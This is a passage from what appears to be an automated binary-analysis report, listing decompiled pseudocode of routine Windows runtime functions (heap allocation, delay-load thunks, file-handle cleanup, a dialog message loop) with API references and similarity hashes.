          					 *((intOrPtr*)(_t62 - 0x24)) = 0;
          					 *((intOrPtr*)(_t62 - 0x20)) = 0;
          					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
          					 *((intOrPtr*)(_t62 - 0x18)) = 0;
          					 *((char*)(_t62 - 0x14)) = 0;
          					 *((char*)(_t62 - 4)) = 2;
          					_t50 = _t62 - 0x7d24;
          					_t33 = E001F192E(_t57, _t62 - 0x24);
          					__eflags = _t33;
          					if(_t33 != 0) {
          						_t60 =  *((intOrPtr*)(_t62 - 0x20));
          						_t58 = _t60 + _t60;
          						_push(_t58 + 2);
          						_t55 = E00212B53(_t50);
          						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
          						__eflags = _t55;
          						if(_t55 != 0) {
          							__eflags = 0;
          							 *((short*)(_t58 + _t55)) = 0;
          							E0020EA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
          						} else {
          							_t60 = 0;
          						}
          						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
          					}
          					E001F15E3(_t62 - 0x24);
          					E001F162D(_t62 - 0x7d24, _t58, _t60); // executed
          					_t36 = 1;
          				} else {
          					E001F162D(_t62 - 0x7d24, _t58, _t60);
          					_t36 = 0;
          				}
          				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
          				return _t36;
          			}

















          APIs
          • __EH_prolog.LIBCMT ref: 00209EF4
            • Part of subcall function 001F137D: __EH_prolog.LIBCMT ref: 001F1382
            • Part of subcall function 001F137D: new.LIBCMT ref: 001F13FA
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: ad95a4087a1d58be197e33b2b7d187c83e12b9225ba7c1f9f49d64a98c3b0318
          • Instruction ID: da89fcf4228c622d10970abcea19215f128fa10eb87533fdfb9f2584fa33e56c
          • Opcode Fuzzy Hash: ad95a4087a1d58be197e33b2b7d187c83e12b9225ba7c1f9f49d64a98c3b0318
          • Instruction Fuzzy Hash: 70218B71D1424EEACF14DF94C9819FEB7B4BF29310F0000AAE80AA7243D7756E55CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 67%
          			E001F910B(void* __ebx, void* __edx, void* __edi, void* __eflags) {
          				void* _t21;
          				intOrPtr _t22;
          				intOrPtr _t27;
          				void* _t35;
          				intOrPtr _t37;
          				intOrPtr _t40;
          				void* _t42;
          				void* _t49;
          
          				_t35 = __edx;
          				E0020D870(E00221321, _t42);
          				E001F6ED7(_t42 - 0x20, E001F7C3C());
          				_push( *((intOrPtr*)(_t42 - 0x1c)));
          				_push( *((intOrPtr*)(_t42 - 0x20)));
          				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
          				_t40 = E001FC70F();
          				if(_t40 > 0) {
          					_t27 =  *((intOrPtr*)(_t42 + 0x10));
          					_t37 =  *((intOrPtr*)(_t42 + 0xc));
          					do {
          						_t22 = _t40;
          						asm("cdq");
          						_t49 = _t35 - _t27;
          						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
          							_t40 = _t37;
          						}
          						if(_t40 > 0) {
          							E001FC8C7( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
          							asm("cdq");
          							_t37 = _t37 - _t40;
          							asm("sbb ebx, edx");
          						}
          						_push( *((intOrPtr*)(_t42 - 0x1c)));
          						_push( *((intOrPtr*)(_t42 - 0x20)));
          						_t40 = E001FC70F();
          					} while (_t40 > 0);
          				}
          				_t21 = E001F159C(_t42 - 0x20); // executed
          				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
          				return _t21;
          			}












          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: 4228bd4277faeb8966f3ce4916aaa5b7cbf2a208a9e488854bcbf8fbb2d428f5
          • Instruction ID: 0b19ede8c7b1fabf7b2a85fad58ac4c305effa18c2258728541e5dbf06d17c8f
          • Opcode Fuzzy Hash: 4228bd4277faeb8966f3ce4916aaa5b7cbf2a208a9e488854bcbf8fbb2d428f5
          • Instruction Fuzzy Hash: 2211E177E0042DABCF12BBA8CD41AFEB736AF98350F054125FA04A7252CB308D148BE0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 80%
          			E0020C6FF(void* __ecx, void* __eflags) {
          				void* __ebx;
          				intOrPtr _t18;
          				char _t19;
          				char _t20;
          				void* _t23;
          				void* _t24;
          				void* _t26;
          				void* _t37;
          				void* _t43;
          				intOrPtr _t45;
          
          				_t26 = __ecx;
          				E0020D870(E00221520, _t43);
          				_push(_t26);
          				E0020D940();
          				_push(_t24);
          				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
          				E00214D7E(0x2439fa, "X");
          				E001FFB08(0x245a1c, _t37, 0x2222e0);
          				E00214D7E(0x244a1a,  *((intOrPtr*)(_t43 + 0xc)));
          				E001F5A9F(0x23b708, _t37,  *((intOrPtr*)(_t43 + 0xc)));
          				_t4 = _t43 - 4;
          				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
          				_t18 = 2;
          				 *0x2429d8 = _t18;
          				 *0x2429d4 = _t18;
          				 *0x2429d0 = _t18;
          				_t19 =  *0x2375d4; // 0x0
          				 *0x24185b = _t19;
          				_t20 =  *0x2375d5; // 0x1
          				 *0x241894 = 1;
          				 *0x241897 = 1;
          				 *0x24185c = _t20;
          				E001F7ADF(_t43 - 0x2108, _t37,  *_t4, 0x23b708);
          				 *(_t43 - 4) = 1;
          				E001F7C55(_t43 - 0x2108, _t37,  *_t4);
          				_t23 = E001F7B71(_t24, _t43 - 0x2108, _t37); // executed
          				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
          				return _t23;
          			}














          APIs
          • __EH_prolog.LIBCMT ref: 0020C704
            • Part of subcall function 001F7ADF: __EH_prolog.LIBCMT ref: 001F7AE4
            • Part of subcall function 001F7ADF: new.LIBCMT ref: 001F7B28
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 91%
          			E0021B0DB(void* __edx, void* __esi, void* __eflags) {
          				intOrPtr _v12;
          				void* __ecx;
          				char _t16;
          				void* _t17;
          				void* _t26;
          				void* _t28;
          				void* _t31;
          				char _t32;
          				void* _t34;
          				intOrPtr* _t36;
          
          				_push(_t26);
          				_push(_t26);
          				_t16 = E00217B1B(_t26, 0x40, 0x30); // executed
          				_t32 = _t16;
          				_v12 = _t32;
          				_t28 = _t31;
          				if(_t32 != 0) {
          					_t2 = _t32 + 0xc00; // 0xc00
          					_t17 = _t2;
          					__eflags = _t32 - _t17;
          					if(__eflags != 0) {
          						_t3 = _t32 + 0x20; // 0x20
          						_t36 = _t3;
          						_t34 = _t17;
          						do {
          							_t4 = _t36 - 0x20; // 0x0
          							E00219C02(_t28, _t36, __eflags, _t4, 0xfa0, 0);
          							 *(_t36 - 8) =  *(_t36 - 8) | 0xffffffff;
          							 *_t36 = 0;
          							_t36 = _t36 + 0x30;
          							 *((intOrPtr*)(_t36 - 0x2c)) = 0;
          							 *((intOrPtr*)(_t36 - 0x28)) = 0xa0a0000;
          							 *((char*)(_t36 - 0x24)) = 0xa;
          							 *(_t36 - 0x23) =  *(_t36 - 0x23) & 0x000000f8;
          							 *((char*)(_t36 - 0x22)) = 0;
          							__eflags = _t36 - 0x20 - _t34;
          						} while (__eflags != 0);
          						_t32 = _v12;
          					}
          				} else {
          					_t32 = 0;
          				}
          				E00217A50(0);
          				return _t32;
          			}














          APIs
            • Part of subcall function 00217B1B: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00218544,00000001,00000364,?,00212E0F,?,?,002300E0), ref: 00217B5C
          • _free.LIBCMT ref: 0021B147
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: AllocateHeap_free
          • String ID:
          • API String ID: 614378929-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 95%
          			E00217B1B(void* __ecx, signed int _a4, signed int _a8) {
          				void* __esi;
          				void* _t8;
          				void* _t12;
          				signed int _t13;
          				void* _t15;
          				signed int _t16;
          				signed int _t18;
          				long _t19;
          
          				_t15 = __ecx;
          				_t18 = _a4;
          				if(_t18 == 0) {
          					L2:
          					_t19 = _t18 * _a8;
          					if(_t19 == 0) {
          						_t19 = _t19 + 1;
          					}
          					while(1) {
          						_t8 = RtlAllocateHeap( *0x250874, 8, _t19); // executed
          						if(_t8 != 0) {
          							break;
          						}
          						__eflags = E00217906();
          						if(__eflags == 0) {
          							L8:
          							 *((intOrPtr*)(E00217ECC())) = 0xc;
          							__eflags = 0;
          							return 0;
          						}
          						_t12 = E00216763(_t15, _t16, _t19, __eflags, _t19);
          						_pop(_t15);
          						__eflags = _t12;
          						if(_t12 == 0) {
          							goto L8;
          						}
          					}
          					return _t8;
          				}
          				_t13 = 0xffffffe0;
          				_t16 = _t13 % _t18;
          				if(_t13 / _t18 < _a8) {
          					goto L8;
          				}
          				goto L2;
          			}












          APIs
          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00218544,00000001,00000364,?,00212E0F,?,?,002300E0), ref: 00217B5C
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 94%
          			E001F5A1D(intOrPtr __ecx, void* __eflags) {
          				intOrPtr _t25;
          				intOrPtr _t34;
          				void* _t36;
          
          				_t25 = __ecx;
          				E0020D870(E00221216, _t36);
          				_push(_t25);
          				_t34 = _t25;
          				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
          				E001FAD1B(_t25); // executed
          				_t2 = _t36 - 4;
          				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
          				E001FFAE6();
          				 *(_t36 - 4) = 1;
          				E001FFAE6();
          				 *(_t36 - 4) = 2;
          				E001FFAE6();
          				 *(_t36 - 4) = 3;
          				E001FFAE6();
          				 *(_t36 - 4) = 4;
          				E001FFAE6();
          				 *(_t36 - 4) = 5;
          				E001F5C12(_t34,  *_t2);
          				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
          				return _t34;
          			}







          APIs
          • __EH_prolog.LIBCMT ref: 001F5A22
            • Part of subcall function 001FAD1B: __EH_prolog.LIBCMT ref: 001FAD20
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 94%
          			E00217A8A(void* __ecx, long _a4) {
          				void* __esi;
          				void* _t4;
          				void* _t6;
          				void* _t7;
          				void* _t8;
          				long _t9;
          
          				_t7 = __ecx;
          				_t9 = _a4;
          				if(_t9 > 0xffffffe0) {
          					L7:
          					 *((intOrPtr*)(E00217ECC())) = 0xc;
          					__eflags = 0;
          					return 0;
          				}
          				if(_t9 == 0) {
          					_t9 = _t9 + 1;
          				}
          				while(1) {
          					_t4 = RtlAllocateHeap( *0x250874, 0, _t9); // executed
          					if(_t4 != 0) {
          						break;
          					}
          					__eflags = E00217906();
          					if(__eflags == 0) {
          						goto L7;
          					}
          					_t6 = E00216763(_t7, _t8, _t9, __eflags, _t9);
          					_pop(_t7);
          					__eflags = _t6;
          					if(_t6 == 0) {
          						goto L7;
          					}
          				}
          				return _t4;
          			}










          APIs
          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00212FA6,?,0000015D,?,?,?,?,00214482,000000FF,00000000,?,?), ref: 00217ABC
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 89%
          			E001F94DA(void* __ecx) {
          				void* _t16;
          				void* _t21;
          
          				_t21 = __ecx;
          				_t16 = 1;
          				if( *(__ecx + 4) != 0xffffffff) {
          					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
          						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
          						asm("sbb bl, bl");
          						_t16 =  ~_t5 + 1;
          					}
          					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
          				}
          				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
          				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
          					E001F6C7B(0x2300e0, _t21 + 0x1e);
          				}
          				return _t16;
          			}






          APIs
          • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,001F94AA), ref: 001F94F5
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: ChangeCloseFindNotification
          • String ID:
          • API String ID: 2591292051-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001FA1E0
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: CloseFind
          • String ID:
          • API String ID: 1863332320-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 75%
          			E002002E8() {
          				void* __esi;
          				void* _t2;
          
          				E00200FAF(); // executed
          				_t2 = E00200FB4();
          				if(_t2 != 0) {
          					_t2 = E001F6CC9(_t2, 0x2300e0, 0xff, 0xff);
          				}
          				if( *0x2300eb != 0) {
          					_t2 = E001F6CC9(_t2, 0x2300e0, 0xff, 0xff);
          				}
          				__imp__SetThreadExecutionState(1);
          				return _t2;
          			}






          APIs
          • SetThreadExecutionState.KERNEL32 ref: 0020031D
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: ExecutionStateThread
          • String ID:
          • API String ID: 2211380416-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 68%
          			E002095CF(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
          				signed int _v8;
          				void* _t6;
          
          				_push(__ecx);
          				_push(0x10);
          				L0020D7F6();
          				_v8 = __eax;
          				if(__eax == 0) {
          					return 0;
          				}
          				_t6 = E0020938E(__eax, _a4, _a8); // executed
          				return _t6;
          			}






          APIs
          • GdipAlloc.GDIPLUS(00000010), ref: 002095D5
            • Part of subcall function 0020938E: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002093AF
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: Gdip$AllocBitmapCreateFromStream
          • String ID:
          • API String ID: 1915507550-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E001F9745(void* __ecx) {
          				long _t3;
          
          				if( *(__ecx + 4) != 0xffffffff) {
          					_t3 = GetFileType( *(__ecx + 4)); // executed
          					if(_t3 == 2 || _t3 == 3) {
          						return 1;
          					} else {
          						return 0;
          					}
          				} else {
          					return 0;
          				}
          			}





          APIs
          • GetFileType.KERNELBASE(000000FF,001F9683), ref: 001F9751
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: FileType
          • String ID:
          • API String ID: 3081899298-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0020C9FE(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
          				void* _t7;
          
          				SendDlgItemMessageW( *0x2375c8, 0x6a, 0x402, E001FF749(_a20, _a24, _a28, _a32), 0); // executed
          				_t7 = E0020A388(); // executed
          				return _t7;
          			}




          0x0020ca23
          0x0020ca29
          0x0020ca2e

          APIs
          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0020CA23
            • Part of subcall function 0020A388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0020A399
            • Part of subcall function 0020A388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0020A3AA
            • Part of subcall function 0020A388: IsDialogMessageW.USER32(000F004A,?), ref: 0020A3BE
            • Part of subcall function 0020A388: TranslateMessage.USER32(?), ref: 0020A3CC
            • Part of subcall function 0020A388: DispatchMessageW.USER32(?), ref: 0020A3D6
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: Message$DialogDispatchItemPeekSendTranslate
          • String ID:
          • API String ID: 897784432-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E0020D1A4() {
          				void* _t3;
          				void* _t4;
          				void* _t8;
          				void* _t9;
          				void* _t10;
          
          				_push(_t4);
          				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab6c, 0x22df08); // executed
          				goto __eax;
          			}








          0x0020d1ae
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E0020D1BF() {
          				void* _t3;
          				void* _t4;
          				void* _t8;
          				void* _t9;
          				void* _t10;
          
          				_push(_t4);
          				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab6c, 0x22df10); // executed
          				goto __eax;
          			}








          0x0020d1ae
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E0020D1C9() {
          				void* _t3;
          				void* _t4;
          				void* _t8;
          				void* _t9;
          				void* _t10;
          
          				_push(_t4);
          				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab6c, 0x22df0c); // executed
          				goto __eax;
          			}








          0x0020d1ae
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E0020D1DD() {
          				void* _t3;
          				void* _t4;
          				void* _t8;
          				void* _t9;
          				void* _t10;
          
          				_push(_t4);
          				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab6c, 0x22df04); // executed
          				goto __eax;
          			}








          0x0020d1ae
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E0020D234() {
          				void* _t3;
          				void* _t4;
          				void* _t8;
          				void* _t9;
          				void* _t10;
          
          				_push(_t4);
          				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab8c, 0x22dffc); // executed
          				goto __eax;
          			}








          0x0020d20f
          0x0020d217
          0x0020d21e

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D217
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E0020D23E() {
          				void* _t3;
          				void* _t4;
          				void* _t8;
          				void* _t9;
          				void* _t10;
          
          				_push(_t4);
          				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab8c, 0x22dff0); // executed
          				goto __eax;
          			}








          0x0020d20f
          0x0020d217
          0x0020d21e

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D217
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E0020D205() {
          				void* _t3;
          				void* _t4;
          				void* _t8;
          				void* _t9;
          				void* _t10;
          
          				_push(_t4);
          				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22ab8c, 0x22dff8); // executed
          				goto __eax;
          			}








          0x0020d20f
          0x0020d217
          0x0020d21e

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D217
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E0020D7DA() {
          				void* _t3;
          				void* _t4;
          				void* _t8;
          				void* _t9;
          				void* _t10;
          
          				_push(_t4);
          				E0020D53A(_t3, _t4, _t8, _t9, _t10, 0x22abcc, 0x22deb4); // executed
          				goto __eax;
          			}








          0x0020d7e4
          0x0020d7ec
          0x0020d7f3

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D7EC
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 22%
          			E0020D1EC() {
          				void* _t2;
          				void* _t3;
          				void* _t6;
          				void* _t7;
          				void* _t8;
          
          				_push(0x22ab6c); // executed
          				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
          				goto __eax;
          			}








          0x0020d1b1
          0x0020d1b6
